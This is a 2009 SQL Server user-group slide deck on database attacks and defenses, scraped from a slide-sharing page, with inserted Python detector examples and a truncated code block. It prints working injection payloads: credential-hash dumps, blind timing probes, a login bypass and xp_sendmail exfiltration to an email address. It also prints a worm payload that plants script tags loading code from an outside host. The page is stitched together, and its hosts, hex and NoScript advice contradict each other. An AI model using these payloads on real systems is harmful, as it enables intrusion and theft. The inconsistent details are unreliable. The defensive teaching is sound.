Think like a hacker
DB attack vectors, Thwarting techniques

Presented by Sudha Iyer | Apr 8, 2009
Presented to the San Francisco SQL Server User Group
www.BayAreaSQL.org
Leader: Mark Ginnebaugh

What's This Presentation All About?

- Is there an enemy?
- Common Database Hacking Techniques
- Raising the bar for the hackers

                © Copyright LogLogic Inc.   |   Thursday, April 09, 2009   Page 2
Why Protect The Database?

- Databases hold sensitive information – and lots of it:
  • Customer data, accounts, transactions, payroll, investor data
- When a breach occurs, damage is significant:
  • Direct damages and costs
  • Bad publicity
  • Regulatory penalties

Some Recent Examples

- July 2005 – January 2007: TJX
  • 45.7M+ credit/debit card records stolen
  • Sophisticated attack (WiFi -> Internal Network -> DB)
  • Result: data sold to data brokers and used in many scams; TJX faces lawsuits and losses of $25M until May 07 (will grow considerably)
- July 2007 – Fidelity National Information Services
  • Bank and credit data of 2.3M customers - stolen by a DBA
- And many more breaches… not only in the U.S. (e.g. Home Office breach in the U.K.)
- Many breaches are unknown, not made public, or remain undetected
- Over 216,686,736 identifiable records in the US alone:
  http://www.privacyrights.org/ar/ChronDataBreaches.htm

Know Your Enemy

- Unauthorized access - not just hackers
  • Too many privileges
- Internal attacks
  • Disgruntled employees
  • Just trying to get the job done
  • Industrial espionage, identity theft, etc.
  • Look around you!!!
- External attacks
  • Web or network access

The Problems

- Does a hacker need DBA access?
- Myriad of privileges
  • System level, application level, data access
  • Any privilege in the right circumstances can be an issue
- Other issues
  • Network issues, incorrect configuration
  • Too many features – large attack surface

The Problems

- Most typical problems of real world databases
  • Weak / default passwords for database accounts
  • Missing patches / patchsets – see
    http://en.wikipedia.org/wiki/SQL_slammer_(computer_worm)
  • Insecure customer / 3rd party code (T-SQL stored procedures)

Basic Hacking Techniques

Discovering databases

- Reconnaissance: nmap - http://nmap.org/
- SQLPing3 - http://sqlsecurity.com/

Is password the weakest link?

- Many brute force tools out there

Powerful Tools Are Easily Available

Social Engineering

- Wait for your DBA to go for a coffee break
- Go to his desktop
- Open Management Studio
- Add yourself as an administrator to the database of your choice
- This can be easily scripted and put on a USB drive

SQL Injection

- Wikipedia: SQL injection is a technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed.

SQL Injection

- Exists in any layer of any application
  • Web applications
  • Stored program units
    - Built in
    - User created
- Has many forms
  • Extra queries, unions, order by, sub selects
- Easily avoided
  • Bind variables, strong typing

SQL Injection Types

- In band – use injection to return extra data
  • As part of the normal result set (unions)
  • In error messages
- Out of band – use an alternative route such as UTL_HTTP or DNS to extract data
- Blind / Inference – no data is returned, but the hacker is able to infer the data using return codes, error codes, timing measurements and more

SQL Injection In-band

select * from AdventureWorks.HumanResources.Employee where EmployeeID = 1;
select name, password from sys.syslogins where password is not null

[Result set on the slide: the first statement returns the EmployeeID 1 row from AdventureWorks; the appended statement returns the login names (sa, test, ...) together with their password hashes, shown as raw binary.]

Now, just attack the password hash using either brute-force or dictionary.

SQL Injection In-Band

Using errors – inject the following:

1 and 1 in (select @@version)

Result is:

Msg 245, Level 16, State 1, Line 1
Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2005 - 9.00.3054.00 (Intel X86)
    Mar 23 2007 16:28:52
    Copyright (c) 1988-2005 Microsoft Corporation
    Developer Edition on Windows NT 5.1 (Build 2600: Service Pack 2)
' to data type int.

SQL Injection Out-of-band

Send information via HTTP/SMTP/DNS to an external site:

select * from AdventureWorks.HumanResources.Employee where EmployeeID = 1;
EXEC master.dbo.xp_sendmail
  @recipients = N'slavik@sentrigo.com',
  @query = N'select user, password from sys.syslogins where password is not null';

Blind SQL Injection

Example code (timing-based inference: the response is delayed only when the condition is true):

IF is_srvrolemember('sysadmin') > 0 WAITFOR DELAY '0:0:5'

IF (ascii(substring(@string, @byte, 1)) & power(2, @bit)) > 0 WAITFOR DELAY '0:0:5'

SQL Injection – Web Application

Username = ' or 1=1 --

The original statement looked like:

  'select * from users where username = ''' + username + ''' and password = ''' + password + ''''

The result:

  select * from users where username = '' or 1=1 --' and password = ''

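As an added example (not from the deck), here is the login query above built both ways against an in-memory SQLite table, so the "bind variables" fix from the earlier slide can be run rather than just stated; the table, its rows and the function names are constructed for the demo.

```python
"""Added example, not from the deck: the slide's login query built by string
concatenation (vulnerable) and with bind variables (hardened), run against a
constructed in-memory SQLite table so both behaviours can be observed."""
import sqlite3


def make_db() -> sqlite3.Connection:
    # Constructed sample users; passwords are plaintext only to keep the demo short.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("alice", "s3cret"), ("bob", "hunter2")])
    return conn


def login_concat(conn: sqlite3.Connection, username: str, password: str) -> list:
    """Vulnerable: user input is spliced into the statement text, exactly as on
    the slide, so a quote plus a comment marker rewrites the WHERE clause."""
    sql = ("select * from users where username = '" + username +
           "' and password = '" + password + "'")
    return conn.execute(sql).fetchall()


def login_bound(conn: sqlite3.Connection, username: str, password: str) -> list:
    """Hardened: the statement text is fixed and the values travel as bind
    variables, so a quote or '--' in the input is compared as data."""
    sql = "select * from users where username = ? and password = ?"
    return conn.execute(sql, (username, password)).fetchall()


if __name__ == "__main__":
    db = make_db()
    payload = "' or 1=1 --"          # the username from the slide
    print("concatenated:", login_concat(db, payload, "anything"))  # every row
    print("bound:       ", login_bound(db, payload, "anything"))   # no rows
```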
Real World Example

- Mass SQL worm in the wild since April
- Enumerates all query/input fields and tries various SQL injection techniques
- Iterates over all text fields in the database and adds a link to the JScript
- Result? Data leakage … in broad daylight!

Real World Example

SELECT * FROM dbo.xxx WHERE yyy=1;DECLARE @S VARCHAR(4000);SET
    @S=CAST(0x4445434C415245204054205641524348415228323535292C4043205641524348415228323535292044454
    34C415245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E61
    6D652046524F4D207379736F626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D622E6
    96420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970653D33352
    04F5220622E78747970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F7
    2204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C4043205748494C45284
    04046455443485F5354415455533D302920424547494E20455845432827555044415445205B272B40542B275D2053455
    4205B272B40432B275D3D525452494D28434F4E5645525428564152434841522834303030292C5B272B40432B275D2
    9292B27273C736372697074207372633D687474703A2F2F7777772E616477626E722E636F6D2F622E6A733E3C2F736
    3726970743E27272729204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C4
    04320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F
    7220 AS VARCHAR(4000)); EXEC (@S);-- ORDER BY ooo ASC

Wow, how to read this?

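An added example (not part of the deck) that answers "how to read this?" in code: it pulls the hex literal out of a captured CAST(0x... AS VARCHAR) statement and decodes it, then flags the injection patterns shown on the preceding slides (stacked hex payload, WAITFOR DELAY timing, xp_sendmail, ' or 1=1 --, @@version in an error, reads of syslogins). The sample statements and signature names are constructed; the hex encodes a short constructed fragment, not the worm's payload.

```python
"""Added example, not from the deck: decode the CAST(0x... AS VARCHAR) trick the
worm uses to hide its T-SQL, and flag the injection patterns the deck shows.
Sample statements are constructed; the hex is a short constructed fragment."""
import re
from typing import List

# CAST(0x<hex> AS VARCHAR(n)) or NVARCHAR(n); also accepts the '0×' that PDF
# extraction turned the 'x' into on the slide.
_HEX_CAST = re.compile(r"CAST\s*\(\s*0[x×]([0-9A-Fa-f]+)\s+AS\s+(N?)VARCHAR", re.I)

# One signature per technique on the deck; the names are this example's own.
_SIGNATURES = [
    ("stacked-hex-exec", re.compile(r";\s*DECLARE\s+@\w+.*?CAST\s*\(\s*0[x×]", re.I | re.S)),
    ("cursor-over-catalog", re.compile(r"\bCURSOR\s+FOR\b.*\bsys(objects|columns)\b", re.I | re.S)),
    ("timing-inference", re.compile(r"\bWAITFOR\s+DELAY\b", re.I)),
    ("out-of-band-xp", re.compile(r"\bxp_(sendmail|cmdshell)\b", re.I)),
    ("tautology-comment", re.compile(r"'\s*or\s+1\s*=\s*1\s*--", re.I)),
    ("version-in-error", re.compile(r"\bin\s*\(\s*select\s+@@version\s*\)", re.I)),
    ("logins-hash-read", re.compile(r"\bsyslogins\b", re.I)),
]


def decode_hex_cast(sql: str) -> List[str]:
    """Decoded text of every hex CAST in the statement, in order of appearance.
    VARCHAR payloads are single-byte (the worm's case); NVARCHAR is UTF-16LE."""
    decoded = []
    for m in _HEX_CAST.finditer(sql):
        try:
            raw = bytes.fromhex(m.group(1))
        except ValueError:
            continue  # odd digit count: not a valid literal, nothing to decode
        enc = "utf-16-le" if m.group(2).upper() == "N" else "latin-1"
        decoded.append(raw.decode(enc, errors="replace"))
    return decoded


def flag_statement(sql: str) -> List[str]:
    """Sorted names of the signatures hit by the statement itself or by any
    payload recovered from a hex CAST inside it; [] means nothing fired."""
    texts = [sql] + decode_hex_cast(sql)
    return sorted({name for t in texts for name, rx in _SIGNATURES if rx.search(t)})


# Constructed samples shaped like the deck's slides.  The hex below encodes
# 'DECLARE c CURSOR FOR SELECT name FROM sysobjects' (48 bytes), not the worm.
WORM_LIKE = ("SELECT * FROM dbo.xxx WHERE yyy=1;DECLARE @S VARCHAR(4000);SET @S=CAST("
             "0x4445434C415245206320435552534F5220464F522053454C454354206E616D652046524F4D207379736F626A65637473"
             " AS VARCHAR(4000)); EXEC (@S);-- ORDER BY ooo ASC")
BLIND = "1; IF is_srvrolemember('sysadmin') > 0 WAITFOR DELAY '0:0:5'"
OOB = ("EXEC master.dbo.xp_sendmail @recipients=N'[placeholder address]', "
       "@query=N'select name, password from sys.syslogins where password is not null'")
WEB_LOGIN = "select * from users where username = '' or 1=1 --' and password = ''"
ERROR_BASED = "select * from Employee where EmployeeID = 1 and 1 in (select @@version)"
BENIGN = "select * from AdventureWorks.HumanResources.Employee where EmployeeID = 1"

if __name__ == "__main__":
    for s in (WORM_LIKE, BLIND, OOB, WEB_LOGIN, ERROR_BASED, BENIGN):
        print(flag_statement(s), "<-", s[:60])
    print("decoded:", decode_hex_cast(WORM_LIKE))
```

The cursor signature fires only on the decoded text, which is the point of decoding before matching: a signature that looks at the captured statement alone sees nothing but a hex string.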
Real World Example

Decoded, the hex payload is this T-SQL:

DECLARE @T VARCHAR(255),@C VARCHAR(255)
DECLARE Table_Cursor CURSOR FOR
SELECT a.name,b.name
FROM sysobjects a,syscolumns b
WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+''<script src=http://www.chkadw.com/b.js></script>''')
FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor

Real World Example

The interesting part is here:

'UPDATE ['SOME_TABLE'] SET ['SOME_TEXT_COL']=RTRIM(CONVERT(VARCHAR(4000),['SOME_TEXT_COL']))+''<script src=http://www.chkadw.com/b.js></script>'''

Lesson Learned?
Never use NoScript - even for trusted sites

Thwarting these attacks

Try the off the shelf tools yourself

- Think like a hacker
  • Learn about exploits
  • Always look for security issues
    - Configuration, permissions, bugs
- Learn and use available tools
  • nmap, Metasploit, Wireshark, Hydra, Cryptool, SQLPing, etc.

Develop an information security policy ... and enforce it

- Apply patch sets and upgrades
  • Easier said than done
- Check for default and weak passwords regularly
- Secure the network
  • Valid node checking + firewall
  • Use encryption

Secure By Default; Secure Coding Practices

- Install only what you use, remove all else
  • Reduce your attack surface
- The least privilege principle
  • Lock down packages
    - System access, file access, network access
- Encrypt critical data
- Use secure coding techniques
  • Bind variables, input validation
  • Clear ownership of security issues
- http://checklists.nist.gov/chklst_detail.cfm?config_id=157

Publish Coding Standards, Peer Review

- Avoid hardcoding username/password
- Wrap sensitive/important program code – even if not really safe
- Use fully qualified names for function and procedure calls
- Always validate user/database input
- Be careful with dynamic statements (cursors, SQL statements, …)
- Be careful with file access
- Be careful with OS command execution

Deploy Real Tools: Host-based Sensor Technology

[Diagram: Local Conn (Bequeath) and Network Conn (Listener) enter the DBMS; the host-based sensor sits on the DBMS shared memory and sees stored procedures, triggers, views and data.]

- All database transactions, externally or internally initiated, must go through the shared / cache memory
- Minimal impact on performance – typically less than 5% of a single CPU
- No business interruption (no reboots or restarts)
- Supports SQL Server, Oracle, Sybase

Granular Policy-based Detection

- Security policies determined by granular rules:
  • Predefined (Virtual Patching) – zero effort / Wizard-driven templates for regulations / Administrator-defined

[Diagram: a Rule is a Trigger plus an Action; a Policy is a stack of rules (Rule 1 … Rule 5); the policy layers are Virtual Patching, Compliance Templates, Community Best Practices and Customer-Defined.]

Example rule:
  IF App <> 'SAPFinance' AND object = 'CC_Table'
  THEN
    Send HIGH Alert
    Send mail to: security team
    Terminate User Session
    Quarantine User 60 minutes

LogLogic Database Security Manager

- Meet Compliance Requirements
  » Privileged user monitoring
  » Enforce segregation of duties
  » Protect sensitive data
  » Audit trail and reporting
  » Keep database patches up to date
  » Compensating control for protecting unencrypted data
- Complete Database Security
  » Protect against internal / external attacks
  » Cover all copies, locations and platforms
  » Operate in all environments (encryption, clustering, virtualization)
  » Defend against all types of attacks
  » "Always on" protection in real-time

Integration with LogLogic Log Management Platform

Database Security Manager:
  » Granular policy-based detection
  » Automated database protection
  » Real-time virtual patching

LogLogic Open Log Management:
  » Compliance reporting
  » Long term archival
  » Forensics analysis

Questions?

"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek SchlawackFwdays
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubKalema Edgar
 
Powerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time ClashPowerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time Clashcharlottematthew16
 
Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfAlex Barbosa Coqueiro
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLScyllaDB
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024Lorenzo Miniero
 
Install Stable Diffusion in windows machine
Install Stable Diffusion in windows machineInstall Stable Diffusion in windows machine
Install Stable Diffusion in windows machinePadma Pradeep
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationSlibray Presentation
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brandgvaughan
 
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage CostLeverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage CostZilliz
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebUiPathCommunity
 
Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Scott Keck-Warren
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Mattias Andersson
 
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024BookNet Canada
 
Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Manik S Magar
 
Story boards and shot lists for my a level piece
Story boards and shot lists for my a level pieceStory boards and shot lists for my a level piece
Story boards and shot lists for my a level piececharlottematthew16
 
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsMemoori
 
Search Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdfSearch Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdfRankYa
 
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024Stephanie Beckett
 
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Patryk Bandurski
 

Recently uploaded (20)

"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding Club
 
Powerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time ClashPowerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time Clash
 
Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdf
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQL
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024
 
Install Stable Diffusion in windows machine
Install Stable Diffusion in windows machineInstall Stable Diffusion in windows machine
Install Stable Diffusion in windows machine
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck Presentation
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brand
 
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage CostLeverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio Web
 
Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?
 
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
 
Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!
 
Story boards and shot lists for my a level piece
Story boards and shot lists for my a level pieceStory boards and shot lists for my a level piece
Story boards and shot lists for my a level piece
 
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
AI as an Interface for Commercial Buildings
 
Search Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdfSearch Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdf
 
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024
 
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
 

LogLogic SQL Server Hacking DBs April09

  • 1. Think like a hacker: DB attack vectors, thwarting techniques
    Presented to the San Francisco SQL Server User Group (www.BayAreaSQL.org, leader: Mark Ginnebaugh)
    Presented by Sudha Iyer | Apr 8, 2009
  • 2. What’s This Presentation All About?
    • Is there an enemy?
    • Common database hacking techniques
    • Raising the bar for the hackers
    © Copyright LogLogic Inc. | Thursday, April 09, 2009 Page 2
  • 3. Why Protect The Database?
    • Databases hold sensitive information – and lots of it: customer data, accounts, transactions, payroll, investor data
    • When a breach occurs, damage is significant: direct damages and costs, bad publicity, regulatory penalties
  • 4. Some Recent Examples
    • July 2005 – January 2007: TJX. 45.7M+ credit/debit card records stolen; a sophisticated attack (WiFi -> internal network -> DB); result: data sold to data brokers and used in many scams, TJX faces lawsuits and losses of $25M until May 07 (will grow considerably)
    • July 2007: Fidelity National Information Services. Bank and credit data of 2.3M customers, stolen by a DBA
    • And many more breaches… not only in the U.S. (e.g. Home Office breach in the U.K.)
    • Many breaches are unknown, not made public, or remain undetected
    • Over 216,686,736 identifiable records in the US alone: http://www.privacyrights.org/ar/ChronDataBreaches.htm
  • 5. Know Your Enemy
    • Unauthorized access - not just hackers: too many privileges
    • Internal attacks: disgruntled employees; people just trying to get the job done; industrial espionage, identity theft, etc. Look around you!!!
    • External attacks: web or network access
  • 6. The Problems
    • Does a hacker need DBA access? There is a myriad of privileges (system level, application level, data access), and any privilege in the right circumstances can be an issue
    • Other issues: network issues, incorrect configuration; too many features – large attack surface
  • 7. The Problems: most typical problems of real world databases
    • Weak / default passwords for database accounts
    • Missing patches / patchsets – see http://en.wikipedia.org/wiki/SQL_slammer_(computer_worm)
    • Insecure customer / 3rd party code (T-SQL stored procedures)
  • 8. Basic Hacking Techniques
  • 9. Discovering databases
    • Reconnaissance: nmap - http://nmap.org/; SQLPing3 - http://sqlsecurity.com/
  • 10. Is password the weakest link?
    • Many brute force tools out there
  • 11. Powerful Tools Are Easily Available
  • 12. Social Engineering
    • Wait for your DBA to go for a coffee break
    • Go to his desktop
    • Open Management Studio
    • Add yourself as an administrator to the database of your choice
    • This can be easily scripted and put on a USB drive
  • 13. SQL Injection
    • Wikipedia: SQL injection is a technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed.
  • 14. SQL Injection
    • Exists in any layer of any application: web applications; stored program units (built-in or user created)
    • Has many forms: extra queries, unions, order by, sub selects
    • Easily avoided: bind variables, strong typing
  • 15. SQL Injection Types
    • In band – use injection to return extra data: as part of the normal result set (unions), or in error messages
    • Out of band – use an alternative route like UTL_HTTP or DNS to extract data
    • Blind / inference – no data is returned, but the hacker is able to infer the data using return codes, error codes, timing measurements and more
  • 16. SQL Injection In-band
    select * from AdventureWorks.HumanResources.Employee where EmployeeID = 1; select name, password from sys.syslogins where password is not null
    Result: the Employee row for EmployeeID 1 (14417807, 1209, adventure-works\guy1, 16, Production Technician - WC60, 1, 1972-05-15 00:00:00.000, M, M, 1996-07-31 00:00:00.000, 0, 21, 30, 1, AAE1D04A-C237-4974-B4D5-935247737718, 2004-07-31 00:00:00.000), followed by a second result set with the logins sa and test and their password hashes (binary values, which render as unreadable characters on the slide)
    Now, just attack the password hash using either brute-force or dictionary.
  • 17. SQL Injection In-Band
    Using errors – inject the following: 1 and 1 in (select @@version)
    Result is: Msg 245, Level 16, State 1, Line 1 Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2005 - 9.00.3054.00 (Intel X86) Mar 23 2007 16:28:52 Copyright (c) 1988-2005 Microsoft Corporation Developer Edition on Windows NT 5.1 (Build 2600: Service Pack 2) ' to data type int.
  • 18. SQL Injection Out-of-band
    Send information via HTTP/SMTP/DNS to an external site:
    select * from AdventureWorks.HumanResources.Employee where EmployeeID = 1; EXEC master.dbo.xp_sendmail @recipients=N'slavik@sentrigo.com', @query = N'select user, password from sys.syslogins where password is not null';
  • 19. Blind SQL Injection
    Example code:
    if is_srvrolemember('sysadmin') > 0 waitfor delay '0:0:5'
    if (ascii(substring(@string, @byte, 1)) & power(2, @bit)) > 0 waitfor delay '0:0:5'
  • 20. SQL Injection – Web Application
    Username = ' or 1=1 --
    The original statement looked like: 'select * from users where username = ''' + username + ''' and password = ''' + password + ''''
    The result = select * from users where username = '' or 1=1 --' and password = ''
  • 21. Real World Example
    • Mass SQL worm in the wild since April
    • Enumerates all query/input fields and tries various SQL injection techniques
    • Iterates on all text fields in the database and adds a link to the JScript
    • Result? Data leakage … in broad daylight!
  • 22. Real World Example
    SELECT * FROM dbo.xxx WHERE yyy=1;DECLARE @S VARCHAR(4000);SET @S=CAST(0x4445434C415245204054205641524348415228323535292C4043205641524348415228323535292044454 34C415245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970653D3335204F5220622E78747970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20455845432827555044415445205B272B40542B275D205345542005B272B40432B275D3D525452494D28434F4E5645525428564152434841522834303030292C5B272B40432B275D29292B27273C736372697074207372633D687474703A2F2F7777772E616477626E722E636F6D2F622E6A733E3C2F7363726970743E27272729204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F7220 AS VARCHAR(4000)); EXEC (@S);-- ORDER BY ooo ASC
    Wow, how to read this?
  • 23. Real World Example
    DECLARE @T VARCHAR(255),@C VARCHAR(255)
    DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167)
    OPEN Table_Cursor
    FETCH NEXT FROM Table_Cursor INTO @T,@C
    WHILE(@@FETCH_STATUS=0) BEGIN
      EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+''<script src=http://www.chkadw.com/b.js></script>''')
      FETCH NEXT FROM Table_Cursor INTO @T,@C
    END
    CLOSE Table_Cursor
    DEALLOCATE Table_Cursor
  • 24. Real World Example
    The interesting part is here: 'UPDATE ['SOME_TABLE'] SET ['SOME_TEXT_COL']=RTRIM(CONVERT(VARCHAR(4000), ['SOME_TEXT_COL']))+''<script src=http://www.chkadw.com/b.js></script>'''
    Lesson learned? Never use NoScript - even for trusted sites
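To answer "how to read this?" from the defender's side, an added example (not code from the deck): it scans web request log lines for the CAST(0x... AS VARCHAR) shape shown on slide 22, decodes the hex literal and flags the markers slide 23 reveals. The log lines, the encoded statement and the marker list are constructed here for the demonstration.

```python
"""Added example: spotting the encoded worm pattern from slides 22-24 in web logs.

Not code from the original deck. The log lines and the encoded statement are
constructed here; the worm hides its T-SQL as a hex literal inside
CAST(0x... AS VARCHAR(4000)) and then runs it with EXEC(@S).
"""
import re
from urllib.parse import unquote

# One hex literal fed to CAST, as on slide 22 (constructed regex, case-insensitive).
HEX_CAST_RE = re.compile(
    r"CAST\s*\(\s*0x([0-9A-Fa-f]+)\s+AS\s+(?:N?VARCHAR|NCHAR|CHAR)\s*\(\s*\d+\s*\)\s*\)",
    re.IGNORECASE,
)

# Strings a decoded payload of this family contains (slide 23): catalogue
# enumeration of text columns and a script tag appended to every row.
SUSPICIOUS_MARKERS = ("sysobjects", "syscolumns", "<script", "xp_cmdshell")


def decode_hex_literal(hex_digits: str) -> str:
    """Turn the digits of a 0x... literal back into the SQL text they encode."""
    if len(hex_digits) % 2:
        hex_digits = "0" + hex_digits  # tolerate an odd leading nibble
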